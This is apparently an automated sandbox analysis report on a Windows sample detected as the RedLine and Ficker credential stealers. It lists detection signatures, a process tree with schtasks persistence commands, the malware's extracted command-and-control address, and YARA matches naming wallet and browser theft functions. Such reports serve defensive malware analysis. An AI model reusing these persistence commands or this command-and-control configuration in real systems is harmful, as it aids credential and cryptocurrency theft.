Edit tour

Windows Analysis Report
QUOTATION062022.exe

Overview

General Information

Sample Name:	QUOTATION062022.exe
Analysis ID:	648537
MD5:	87af8a3865f441eb06b4ebbeea330099
SHA1:	592b904653dfa0c2a82447d283a9187c9a2145b1
SHA256:	83a8d60614fba531f23e6206d82589e0a197eb4fcb98df32083651281e7e243d
Tags:	exeRedLineStealer
Infos:

Detection

Ficker Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected Ficker Stealer

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Allocates memory in foreign processes

Binary or sample is protected by dotNetProtector

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

QUOTATION062022.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\QUOTATION062022.exe" MD5: 87AF8A3865F441EB06B4EBBEEA330099)

vbc.exe (PID: 6728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6780 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6888 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 6904 cmdline: cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Data.exe (PID: 6952 cmdline: C:\Users\user\AppData\Roaming\Data\Data.exe MD5: 87AF8A3865F441EB06B4EBBEEA330099)

vbc.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6520 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6312 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 6940 cmdline: cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QUOTATION062022.exe PID: 6328	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: QUOTATION062022.exe PID: 6328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 6728	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 6728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 6728	JoeSecurity_ficker_stealer	Yara detected Ficker Stealer	Joe Security
Process Memory Space: Data.exe PID: 6952	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Data.exe PID: 6952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 408	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.vbc.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.vbc.exe.400000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.vbc.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.vbc.exe.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
4.0.vbc.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.vbc.exe.400000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.vbc.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.vbc.exe.400000.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
11.2.Data.exe.3acb170.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.Data.exe.3acb170.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.Data.exe.3acb170.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
11.2.Data.exe.3ae2f90.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
11.2.Data.exe.3ae2f90.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.Data.exe.3ae2f90.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
23.0.vbc.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.0.vbc.exe.400000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.0.vbc.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.0.vbc.exe.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
23.0.vbc.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.0.vbc.exe.400000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.0.vbc.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.0.vbc.exe.400000.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.QUOTATION062022.exe.39cb170.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION062022.exe.39cb170.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.QUOTATION062022.exe.39cb170.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.0.vbc.exe.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.vbc.exe.400000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.vbc.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION062022.exe.39cb170.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
4.0.vbc.exe.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
23.0.vbc.exe.400000.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.0.vbc.exe.400000.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.0.vbc.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.0.vbc.exe.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.QUOTATION062022.exe.39cb170.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION062022.exe.39cb170.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION062022.exe.39cb170.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
0.2.QUOTATION062022.exe.39e2f90.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.QUOTATION062022.exe.39e2f90.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION062022.exe.39e2f90.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
23.0.vbc.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.0.vbc.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.0.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.0.vbc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
4.2.vbc.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.vbc.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vbc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vbc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
23.0.vbc.exe.400000.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
23.0.vbc.exe.400000.3.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
23.0.vbc.exe.400000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
23.0.vbc.exe.400000.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
